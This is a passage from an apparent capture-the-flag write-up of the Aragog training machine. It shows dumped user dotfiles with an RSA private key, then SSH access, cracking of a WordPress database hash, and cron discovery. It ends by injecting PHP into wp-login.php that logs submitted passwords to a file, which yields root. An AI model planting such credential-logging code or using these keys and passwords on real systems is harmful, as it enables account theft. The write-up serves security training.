▒XSMPunix/aragog:/tmp/.ICE-unix/1696MIT-MAGIC-COOKIE-1▒H▒ɀk▒▒▒+▒▒ICE!local/aragog:@/tmp/.ICE-unix/3631MIT-MAGIC-COOKIE-1▒▒N▒s_▒w ▒m ▒ICEunix/aragog:/tmp/.ICE-unix/3631MIT-MAGIC-COOKIE-1āp )▒▒F▒▒}▒:▒XSMP!local/aragog:@/tmp/.ICE-unix/1721MIT-MAGIC-COOKIE-1▒▒▒▒ՑWn▒-▒XSMPunix/aragog:/tmp/.ICE-unix/1721MIT-MAGIC-COOKIE-1▒▒0▒~,o▒xڋ▒5▒~ICE%local/aragog.htb:@/tmp/.ICE-unix/1685MIT-MAGIC-COOKIE-1▒▒$▒▒hY[▒▒#▒o▒ICE#unix/aragog.htb:/tmp/.ICE-unix/1685MIT-MAGIC-COOKIE-1▒d▒▒▒_▒pg▒XSMP%local/aragog.htb:@/tmp/.ICE-unix/1986MIT-MAGIC-COOKIE-1▒W)▒h▒y!jɢ1)▒wXSMP#unix/aragog.htb:/tmp/.ICE-unix/1986MIT-MAGIC-COOKIE-1{▒B▒▒▒K▒▒܁▒▒▒ICE%local/aragog.htb:@/tmp/.ICE-unix/1514MIT-MAGIC-COOKIE-1Y▒  %2▒.▒F▒▒Z▒q▒ICE#unix/aragog.htb:/tmp/.ICE-unix/1514MIT-MAGIC-COOKIE-1▒7▒+F▒f▒▒▒@▒7XSMP%local/aragog.htb:@/tmp/.ICE-unix/4965MIT-MAGIC-COOKIE-1Ρ S9s▒▒*▒▒▒▒]▒ XSMP#unix/aragog.htb:/tmp/.ICE-unix/4965MIT-MAGIC-COOKIE-1▒▒h▒▒▒+7Ѕ▒▒ICE%local/aragog.htb:@/tmp/.ICE-unix/1645MIT-MAGIC-COOKIE-1▒~▒$▒N▒u▒A▒▒V\▒ICE#unix/aragog.htb:/tmp/.ICE-unix/1645MIT-MAGIC-COOKIE-1▒P1R.mqL▒▒`---------------------- /home/florian/.mysql_history PuTTYPuTTYPuTTYPuTTY---------------------- /home/florian/.nc_history ---------------------- /home/florian/.profile # ~/.profile: executed by the command interpreter for login shells. # This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login # exists. # see /usr/share/doc/bash/examples/startup-files for examples. # the files are located in the bash-doc package.
# the default umask is set in /etc/profile; for setting the umask # for ssh logins, install and configure the libpam-umask package. #umask 022
# if running bash if [ -n "$BASH_VERSION" ]; then # include .bashrc if it exists if [ -f "$HOME/.bashrc" ]; then . "$HOME/.bashrc" fi fi
# set PATH so it includes user's private bin directories PATH="$HOME/bin:$HOME/.local/bin:$PATH" ---------------------- /home/florian/.viminfo ---------------------- /home/florian/.vimrc ---------------------- /home/florian/.wget-hsts ---------------------- /home/florian/.Xauthority ▒f▒▒(▒繍aragog0MIT-MAGIC-COOKIE-1▒ 攝]▒y▒5▒▒R▒ aragog.htb0MIT-MAGIC-COOKIE-1&VˮKY▒▒o▒▒▒---------------------- /home/florian/.ssh/authorized_keys ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDnQNC2Y4/vyAtmQGMn8lwLmCawjbX608ffCO8sAdoUyZ/uPh35hAQxsSD7KOPr/JvEkCwXyXaRSF+Tnot2mYLeZ/+w7iuian042SX1Hhy7k4Hl5/yUCM6Drt3FYijvtJOphmtZRWdDifx0obhNv/Prv6BPRH2UP1zQ+FnBGwVCPxooUWfVHUHyf397U8HQAnzU8/EJzdGlUl3BurwEtmtVco2yD5IFR1sFlzesELzUqV7YIH4jHz0dDd14EIvcSlFehhVBngS4KwOjtSULxhKgQGBXHgiBAJbHfi1cKZ7lwlr9Ql13guSy3jDiym1gwfPOyGZQOuSsMkOrqiUvgXIr florian@aragog.htb ---------------------- /home/florian/.ssh/known_hosts ---------------------- /home/florian/.ssh/id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEpAIBAAKCAQEA50DQtmOP78gLZkBjJ/JcC5gmsI21+tPH3wjvLAHaFMmf7j4d +YQEMbEg+yjj6/ybxJAsF8l2kUhfk56LdpmC3mf/sO4romp9ONkl9R4cu5OB5ef8 lAjOg67dxWIo77STqYZrWUVnQ4n8dKG4Tb/z67+gT0R9lD9c0PhZwRsFQj8aKFFn 1R1B8n9/e1PB0AJ81PPxCc3RpVJdwbq8BLZrVXKNsg+SBUdbBZc3rBC81Kle2CB+ Ix89HQ3deBCL3EpRXoYVQZ4EuCsDo7UlC8YSoEBgVx4IgQCWx34tXCme5cJa/UJd d4Lkst4w4sptYMHzzshmUDrkrDJDq6olL4FyKwIDAQABAoIBAAxwMwmsX0CRbPOK AQtUANlqzKHwbVpZa8W2UE74poc5tQ12b9xM2oDluxVnRKMbyjEPZB+/aU41K1bg TzYI2b4mr90PYm9w9N1K6Ly/auI38+Ouz6oSszDoBeuo9PS3rL2QilOZ5Qz/7gFD 9YrRCUij3PaGg46mvdJLmWBGmMjQS+ZJ7w1ouqsIANypMay2t45v2Ak+SDhl/SDb /oBJFfnOpXNtQfJZZknOGY3SlCWHTgMCyYJtjMCW2Sh2wxiQSBC8C3p1iKWgyaSV 0qH/3gt7RXd1F3vdvACeuMmjjjARd+LNfsaiu714meDiwif27Knqun4NQ+2x8JA1 sWmBdcECgYEA836Z4ocK0GM7akW09wC7PkvjAweILyq4izvYZg+88Rei0k411lTV Uahyd7ojN6McSd6foNeRjmqckrKOmCq2hVOXYIWCGxRIIj5WflyynPGhDdMCQtIH zCr9VrMFc7WCCD+C7nw2YzTrvYByns/Cv+uHRBLe3S4k0KNiUCWmuYsCgYEA8yFE rV5bD+XI/iOtlUrbKPRyuFVUtPLZ6UPuunLKG4wgsGsiVITYiRhEiHdBjHK8GmYE tkfFzslrt+cjbWNVcJuXeA6b8Pala7fDp8lBymi8KGnsWlkdQh/5Ew7KRcvWS5q3 HML6ac06Ur2V0ylt1hGh/A4r4YNKgejQ1CcO/eECgYEAk02wjKEDgsO1avoWmyL/ I5XHFMsWsOoYUGr44+17cSLKZo3X9fzGPCs6bIHX0k3DzFB4o1YmAVEvvXN13kpg ttG2DzdVWUpwxP6PVsx/ZYCr3PAdOw1SmEodjriogLJ6osDBVcMhJ+0Y/EBblwW7 HF3BLAZ6erXyoaFl1XShozcCgYBuS+JfEBYZkTHscP0XZD0mSDce/r8N07odw46y kM61To2p2wBY/WdKUnMMwaU/9PD2vN9YXhkTpXazmC0PO+gPzNYbRe1ilFIZGuWs 4XVyQK9TWjI6DoFidSTGi4ghv8Y4yDhX2PBHPS4/SPiGMh485gTpVvh7Ntd/NcI+ 7HU1oQKBgQCzVl/pMQDI2pKVBlM6egi70ab6+Bsg2U20fcgzc2Mfsl0Ib5T7PzQ3 daPxRgjh3CttZYdyuTK3wxv1n5FauSngLljrKYXb7xQfzMyO0C7bE5Rj8SBaXoqv uMQ76WKnl3DkzGREM4fUgoFnGp8fNEZl5ioXfxPiH/Xl5nStkQ0rTA== -----END RSA PRIVATE KEY----- ---------------------- /home/florian/.ssh/id_rsa.pub ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDnQNC2Y4/vyAtmQGMn8lwLmCawjbX608ffCO8sAdoUyZ/uPh35hAQxsSD7KOPr/JvEkCwXyXaRSF+Tnot2mYLeZ/+w7iuian042SX1Hhy7k4Hl5/yUCM6Drt3FYijvtJOphmtZRWdDifx0obhNv/Prv6BPRH2UP1zQ+FnBGwVCPxooUWfVHUHyf397U8HQAnzU8/EJzdGlUl3BurwEtmtVco2yD5IFR1sFlzesELzUqV7YIH4jHz0dDd14EIvcSlFehhVBngS4KwOjtSULxhKgQGBXHgiBAJbHfi1cKZ7lwlr9Ql13guSy3jDiym1gwfPOyGZQOuSsMkOrqiUvgXIr florian@aragog.htb ---------------------- /home/florian/.zsh_history ---------------------- /home/florian/.zshrc ---------------------- /home/florian/.kshrc ---------------------- /home/florian/.mailrc ---------------------- /home/florian/.lastlogin ---------------------- /home/florian/.login ---------------------- /home/florian/.cshrc ---------------------- /home/cliff/.bash_history ---------------------- /home/cliff/.bash_logout ---------------------- /home/cliff/.bashrc ---------------------- /home/cliff/.gdb_history ---------------------- /home/cliff/.gdbinit ---------------------- /home/cliff/.hushlogin ---------------------- /home/cliff/.ICEauthority ---------------------- /home/cliff/.mysql_history ---------------------- /home/cliff/.nc_history ---------------------- /home/cliff/.profile ---------------------- /home/cliff/.viminfo ---------------------- /home/cliff/.vimrc ---------------------- /home/cliff/.wget-hsts ---------------------- /home/cliff/.Xauthority ---------------------- /home/cliff/.ssh/authorized_keys ---------------------- /home/cliff/.ssh/known_hosts ---------------------- /home/cliff/.ssh/id_rsa ---------------------- /home/cliff/.ssh/id_rsa.pub ---------------------- /home/cliff/.zsh_history ---------------------- /home/cliff/.zshrc ---------------------- /home/cliff/.kshrc ---------------------- /home/cliff/.mailrc ---------------------- /home/cliff/.lastlogin ---------------------- /home/cliff/.login ---------------------- /home/cliff/.cshrc ----------------------

Florian's private key is available.

User flag

We create the florian's private key file.

u505@naos:~/HTB/Machines/Aragog$ ./filescontent.sh /home/florian/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA50DQtmOP78gLZkBjJ/JcC5gmsI21+tPH3wjvLAHaFMmf7j4d
+YQEMbEg+yjj6/ybxJAsF8l2kUhfk56LdpmC3mf/sO4romp9ONkl9R4cu5OB5ef8
...
7HU1oQKBgQCzVl/pMQDI2pKVBlM6egi70ab6+Bsg2U20fcgzc2Mfsl0Ib5T7PzQ3
daPxRgjh3CttZYdyuTK3wxv1n5FauSngLljrKYXb7xQfzMyO0C7bE5Rj8SBaXoqv
uMQ76WKnl3DkzGREM4fUgoFnGp8fNEZl5ioXfxPiH/Xl5nStkQ0rTA==
-----END RSA PRIVATE KEY-----
u505@naos:~/HTB/Machines/Aragog$ ./filescontent.sh /home/florian/.ssh/id_rsa > florian.key
u505@naos:~/HTB/Machines/Aragog$ chmod 600 florian.key
u505@naos:~/HTB/Machines/Aragog$ ssh -i florian.key florian@aragog
Last login: Fri Jan 12 13:56:45 2018 from 10.10.14.3
florian@aragog:~$ whoami
florian
florian@aragog:~$ cat user.txt
<USER_FLAG>

Privileges escalation

Enumeration tools

u505@naos:~/HTB/Machines/Aragog$ scp -i florian.key /opt/utils/LinEnum/LinEnum.sh florian@aragog:/home/florian/
LinEnum.sh                                    100%   46KB 379.9KB/s   00:00
u505@naos:~/HTB/Machines/Aragog$ scp -i florian.key /opt/utils/pspy/pspy64 florian@aragog:/home/florian/
pspy64                                        100% 3006KB   6.2MB/s   00:00

Word press

In the apache folder, there is a dev_wiki folder, that we did not enumerate before.

florian@aragog:/var/www/html$ ls -ltr
total 24
-rw-r--r-- 1 www-data www-data 11321 Dec 18  2017 index.html
drw-r--r-- 5 cliff    cliff     4096 Dec 20  2017 zz_backup
-rw-r--r-- 1 www-data www-data   689 Dec 21  2017 hosts.php
drwxrwxrwx 5 cliff    cliff     4096 Jan 18 09:50 dev_wiki

Aragog05.png

It is a WordPress site.

Database access

From the word press config file, database access credentials are retreived.

florian@aragog:/var/www/html/dev_wiki$ cat wp-config.php | grep DB
define('DB_NAME', 'wp_wiki');
define('DB_USER', 'root');
define('DB_PASSWORD', '$@y6CHJ^$#5c37j$#6h');
define('DB_HOST', 'localhost');
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', );

Mysql into it.

florian@aragog:/var/www/html/dev_wiki$ mysql -p -u root
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 62
Server version: 5.7.20-0ubuntu0.16.04.1 (Ubuntu)

Copyright (c) 2000, 2017, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | mysql | | performance_schema | | sys | | wp_wiki | +--------------------+ 5 rows in set (0.02 sec)
mysql> use wp_wiki Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A
Database changed mysql> show tables; +-----------------------+ | Tables_in_wp_wiki | +-----------------------+ | wp_commentmeta | | wp_comments | | wp_links | | wp_options | | wp_postmeta | | wp_posts | | wp_term_relationships | | wp_term_taxonomy | | wp_termmeta | | wp_terms | | wp_usermeta | | wp_users | +-----------------------+ 12 rows in set (0.00 sec)
mysql> select * from wp_users; +----+---------------+------------------------------------+---------------+-----------------+----------+---------------------+---------------------+-------------+---------------+ | ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name | +----+---------------+------------------------------------+---------------+-----------------+----------+---------------------+---------------------+-------------+---------------+ | 1 | Administrator | $P$B3FUuIdSDW0IaIc4vsjj.NzJDkiscu. | administrator | it@megacorp.com | | 2017-12-20 23:26:04 | | 0 | Administrator | +----+---------------+------------------------------------+---------------+-----------------+----------+---------------------+---------------------+-------------+---------------+ 1 row in set (0.00 sec)
mysql> quit Bye

Search for the hashcat mode.

u505@naos:~/HTB/Machines/Aragog$ hashcat --example-hashes  | grep -B1 -A 2 php
MODE: 400
TYPE: phpass
HASH: $P$946647711V1klyitUYhtB8Yw5DMA/w.
PASS: hashcat
u505@naos:~/HTB/Machines/Aragog$ cat wphash
$P$B3FUuIdSDW0IaIc4vsjj.NzJDkiscu.

Hashcat the hash.

u505@naos:~/HTB/Machines/Aragog$ hashcat -m 400 wphash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
hashcat (v6.1.1) starting...
...
Session..........: hashcat
Status...........: Exhausted
Hash.Name........: phpass
Hash.Target......: $P$B3FUuIdSDW0IaIc4vsjj.NzJDkiscu.
Time.Started.....: Sun Jan 17 11:20:41 2021 (1 min, 15 secs)
Time.Estimated...: Sun Jan 17 11:21:56 2021 (0 secs)
Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   190.3 kH/s (6.58ms) @ Accel:8 Loops:256 Thr:1024 Vec:1
Recovered........: 0/1 (0.00%) Digests
Progress.........: 14344384/14344384 (100.00%)
Rejected.........: 0/14344384 (0.00%)
Restore.Point....: 14344384/14344384 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:7936-8192
Candidates.#1....: $HEX[2321676f7468] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Temp: 73c Util:100% Core:1202MHz Mem:2505MHz Bus:16

Started: Sun Jan 17 11:20:37 2021 Stopped: Sun Jan 17 11:21:57 2021

Unfortunately, the password is not in rockyou.txt dictionary.

Cron jobs

Pspy enumerates 2 different scheduled jobs.

2021/01/17 08:24:01 CMD: UID=1001 PID=7401   | /usr/bin/python /home/cliff/wp-login.py
2021/01/17 08:24:01 CMD: UID=1001 PID=7400   | /bin/sh -c /usr/bin/python /home/cliff/wp-login.py
2021/01/17 08:24:01 CMD: UID=0    PID=7399   | /usr/sbin/CRON -f
2021/01/17 08:24:01 CMD: UID=1001 PID=7402   | /usr/bin/python /home/cliff/wp-login.py
2021/01/17 08:24:01 CMD: UID=1001 PID=7404   | /usr/bin/python /home/cliff/wp-login.py
2021/01/17 08:24:01 CMD: UID=1001 PID=7405   | uname -p

Each minute, the python script wp-login.py is called.

2021/01/17 08:30:01 CMD: UID=0    PID=7456   | rm -rf /var/www/html/dev_wiki/
2021/01/17 08:30:01 CMD: UID=0    PID=7455   | /bin/bash /root/restore.sh
2021/01/17 08:30:01 CMD: UID=0    PID=7457   | cp -R /var/www/html/zz_backup/ /var/www/html/dev_wiki/
2021/01/17 08:30:01 CMD: UID=0    PID=7462   | chown -R cliff:cliff /var/www/html/dev_wiki/
2021/01/17 08:30:01 CMD: UID=0    PID=7463   | chmod -R 777 /var/www/html/dev_wiki/

Every 5 minutes the script /root/restore.sh is called, and it seems that it overwrites the wiki folder.

Intercept wiki credentials

We have access to the source code of the word press. We can add some lines to save REQUEST parameter in a file. In real condition, we would need to wait until someone log in the page, in this case we assume that the script wp-login.py is a scripted simulation of a user login.

florian@aragog:/var/www/html/dev_wiki$ head -n 30 wp-login.php
<?php
/**
 * WordPress User Page
 *
 * Handles authentication, registering, resetting passwords, forgot password,
 * and other user handling.
 *
 * @package WordPress
 */

/** Make sure that the WordPress bootstrap has run before continuing. */ require( dirname(__FILE__) . '/wp-load.php' );
$req_dump = print_r($_REQUEST, TRUE); $fp = fopen('/tmp/request.txt', 'a'); fwrite($fp, $req_dump); fclose($fp);
// Redirect to https login if forced to use SSL if ( force_ssl_admin() && ! is_ssl() ) { if ( 0 === strpos($_SERVER['REQUEST_URI'], 'http') ) { wp_redirect( set_url_scheme( $_SERVER['REQUEST_URI'], 'https' ) ); exit(); } else { wp_redirect( 'https://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'] ); exit(); } }
/**

If someone access the wp-login.php page, the parameters will be written in the file. We try it, and catch our failed credentials. The backup is restored every 5 minutes, so we need to intercept the user password before the cron reverse our changes.

Aragog06.png

florian@aragog:/var/www/html/dev_wiki$ cat /tmp/request.txt
Array
(
    [log] => u505
    [pwd] => u505
    [wp-submit] => Log In
    [redirect_to] => http://aragog/dev_wiki/wp-admin/
    [testcookie] => 1
)

After one minute, when the process wp-login.py runs, a second request is intercepted.

florian@aragog:/var/www/html/dev_wiki$ cat /tmp/request.txt
Array
(
    [log] => u505
    [pwd] => u505
    [wp-submit] => Log In
    [redirect_to] => http://aragog/dev_wiki/wp-admin/
    [testcookie] => 1
)
Array
(
    [pwd] => !KRgYs(JFO!&MTr)lf
    [wp-submit] => Log In
    [testcookie] => 1
    [log] => Administrator
    [redirect_to] => http://127.0.0.1/dev_wiki/wp-admin/
)

The administrator password of WordPress is intercepted.

Root flag

The WP password has been reused for the root account.

florian@aragog:/var/www/html/dev_wiki$ su -
Password:
root@aragog:~# whoami
root
root@aragog:~# cat root.txt
<ROOT_FLAG>

References

Daniel Simao 20:51, 17 January 2021 (EST)